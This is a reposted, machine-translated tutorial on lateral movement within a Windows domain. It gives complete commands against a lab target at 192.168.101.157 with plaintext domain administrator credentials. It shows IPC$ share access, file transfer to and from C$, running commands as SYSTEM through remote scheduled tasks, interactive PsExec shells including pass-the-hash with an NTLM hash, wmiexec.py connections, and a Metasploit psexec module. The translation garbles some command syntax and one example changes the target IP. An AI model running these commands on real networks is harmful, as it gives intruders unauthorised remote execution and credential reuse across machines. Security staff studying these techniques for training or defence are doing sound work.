Shulou(Shulou.com)06/03 Report--

This article mainly explains "how to use the command line tool of lateral movement in the intranet". The content of the explanation in the article is simple and clear, and it is easy to learn and understand. let's study and learn "how to use the command line tool of lateral movement in the intranet".

Target machine: 192.168.101.157

I. IPC$ connection

IPC$ (Internet Process Connection) is a resource that shares "named pipes". It is an open named pipe for inter-process communication. By providing trusted user names and passwords, both sides of the connection can establish a secure channel and exchange encrypted data on this channel, thus realizing access to remote computers.

To call up the command line window, you can first execute net use to view the established connections.

Execute the following command to establish an ipc$ connection with the target

Net use\\ 192.168.101.157 (target ip) / u:god (domain name)\ Administrator (user name) hongrisec@2020 (password)

Successful execution returns the successful completion of the command

You can then use the dir command to list the target folder files, such as the following command to list the folders under disk c

Dir\\ 192.168.101.157\ c $

List the files of the phpStudy directory under disk c

Dir\\ 192.168.101.157\ c$\ phpStudy

If you want to download the file, execute the following command to download the phpshao.dll file and store it in the temp folder

Copy\\ 192.168.101.157\ c$\ phpStudy\ phpshao.dll C:\ Windows\ temp

By the same token, execute if you want to upload a file

Copy F:\ test.txt\ 192.168.101.157\ c$

You can see that the files have been transferred.

You can also execute system commands through scheduled tasks, first by executing the following command to create a scheduled task called test2

Schtasks / create / s 192.168.101.157 / tn test2 / sc minute / mo 1 / tr "C:\ Windows\ System32\ cmd.exe / c 'whoami > C:\ Windows\ temp\ test2.txt'" / ru system / f / u god\ Administrator / p hongrisec@2020

Then execute the following command to perform the planned task immediately

Schtasks / run / s 192.168.101.157 / I / tn test2 / u god\ Administrator / p hongrisec@2020

Use the type command to view the echo of the execution content after a successful execution

Type\\ 192.168.101.157\ c$\ Windows\ temp\ test2.txt

II. Psexec

You can also connect to the target through psexec, but the noise is a little loud, and a service will be set up on the target machine, generating a large number of logs.

You can download it here.

Execute the following command to get an interactive shell, and if a connection cannot be established, try to execute it as an administrator

PsExec64.exe-accepteula\\ 192.168.101.157 (destination IP)-u god (domain)\ Administrator (user name)-p hongrisec@2020 (password)-s cmd.exe

You can also use hash to connect by executing the following command

Psexec.exe-hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 god/Administrator@192.168.1.1 "whoami"

Of course, there are modules in msf that can connect with the target through psexec.

Exploit/windows/smb/psexec

III. Wmiexec.py connection

You can download the toolkit here

You can establish a connection by directly executing the following command

Python wmiexec.py god (domain) / administrator (user name): hongrisec@2020 (password) @ 192.168.101.157 (target IP)

You can also use hash to connect to the target, just change it a little bit

Thank you for your reading. the above is the content of "how to use the command line tool for lateral movement in the intranet". After the study of this article, I believe you have a deeper understanding of the problem of how to use the command line tool for lateral movement in the intranet, and the specific use needs to be verified in practice. Here is, the editor will push for you more related knowledge points of the article, welcome to follow!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.